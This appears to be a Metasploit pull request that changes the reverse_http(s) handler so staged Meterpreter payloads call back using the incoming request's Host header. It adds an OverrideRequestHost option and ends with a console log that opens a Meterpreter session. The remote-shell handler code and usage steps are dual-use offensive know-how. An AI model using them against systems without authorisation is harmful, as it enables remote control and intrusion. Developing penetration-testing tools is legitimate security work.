### PR TITLE
Use host header in reverse_http(s)

### DIFF
--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -92,13 +92,15 @@ module ReverseHttp
   # addresses.
   #
   # @return [String] A URI of the form +scheme://host:port/+
-  def payload_uri
-    if ipv6?
-      callback_host = "[#{datastore['LHOST']}]"
+  def payload_uri(req)
+    if req and req.headers and req.headers['Host']
+      callback_host = req.headers['Host']
+    elsif ipv6?
+      callback_host = "[#{datastore['LHOST']}]:#{datastore['LPORT']}"
     else
-      callback_host = datastore['LHOST']
+      callback_host = "#{datastore['LHOST']}:#{datastore['LPORT']}"
     end
-    "#{scheme}://#{callback_host}:#{datastore['LPORT']}/"
+    "#{scheme}://#{callback_host}/"
   end
 
   # Use the {#refname} to determine whether this handler uses SSL or not
@@ -186,7 +188,7 @@ protected
     case uri_match
       when /^\/INITPY/
         conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
-        url = payload_uri + conn_id + '/'
+        url = payload_uri(req) + conn_id + '/'
 
         blob = ""
         blob << obj.generate_stage
@@ -221,7 +223,7 @@ protected
 
       when /^\/INITJM/
         conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
-        url = payload_uri + conn_id + "/\x00"
+        url = payload_uri(req) + conn_id + "/\x00"
 
         blob = ""
         blob << obj.generate_stage
@@ -249,7 +251,7 @@ protected
 
       when /^\/A?INITM?/
         conn_id = generate_uri_checksum(URI_CHECKSUM_CONN) + "_" + Rex::Text.rand_text_alphanumeric(16)
-        url = payload_uri + conn_id + "/\x00"
+        url = payload_uri(req) + conn_id + "/\x00"
 
         print_status("#{cli.peerhost}:#{cli.peerport} Staging connection for target #{req.relative_resource} received...")
         resp['Content-Type'] = 'application/octet-stream'
@@ -294,7 +296,7 @@ protected
         create_session(cli, {
           :passive_dispatcher => obj.service,
           :conn_id            => conn_id,
-          :url                => payload_uri + conn_id + "/\x00",
+          :url                => payload_uri(req) + conn_id + "/\x00",
           :expiration         => datastore['SessionExpirationTimeout'].to_i,
           :comm_timeout       => datastore['SessionCommunicationTimeout'].to_i,
           :ssl                => ssl?,

--- a/lib/msf/core/handler/reverse_http.rb
+++ b/lib/msf/core/handler/reverse_http.rb
@@ -53,6 +53,7 @@ module ReverseHttp
         OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]),
         OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']),
         OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]),
+        OptBool.new('OverrideRequestHost', [ false, 'Forces clients to connect to LHOST:LPORT instead of keeping original payload host', false ]),
         OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '<html><body><h1>It works!</h1></body></html>'  ])
       ], Msf::Handler::ReverseHttp)
   end
@@ -93,7 +94,7 @@ module ReverseHttp
   #
   # @return [String] A URI of the form +scheme://host:port/+
   def payload_uri(req)
-    if req and req.headers and req.headers['Host']
+    if req and req.headers and req.headers['Host'] and not datastore['OverrideRequestHost']
       callback_host = req.headers['Host']
     elsif ipv6?
       callback_host = "[#{datastore['LHOST']}]:#{datastore['LPORT']}"


### PR DESCRIPTION
Problem: when a meterpreter/reverse_http (and reverse_https) payload connects back, it downloads a stage; this stage does not use the initial URL requested by the payload; it uses one with the LHOST and LPORT of the listener. If those are the same, this works out fine, but it prevents one handler from properly handling connections to multiple IP's (if your box has multiple IP's) or from properly handling forwarded connections; e.g. from an SSH tunnel to a remote system. The first request will come in, but then every following request will use the listener's LHOST/LPORT; which may not be allowed out by that target. Both of which make reverse_http(s) impossible to work with multiple callback IP's or SSH-based hops.

This patch fixes that issue by re-using the same host as the request that came in.

It has the added benefit of not requiring you to think about which IP to listen on, so you can just set LHOST to 0.0.0.0 on the reverse_http(s) handlers, just like you can on the reverse_tcp handlers.

This is a problem ran into most recently by @jlee-r7 and me at CCDC.

msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf exploit(handler) > exploit 

[_] Started HTTPS reverse handler on https://0.0.0.0:8443/
[_] Starting the payload handler...
[_] 192.168.1.5:24080 Request received for /kFiB...
[_] 192.168.1.5:24080 Staging connection for target /kFiB received...
[*] Meterpreter session 1 opened (192.168.1.14:8443 -> 192.168.1.5:24080) at 2015-03-11 19:29:06 -0500
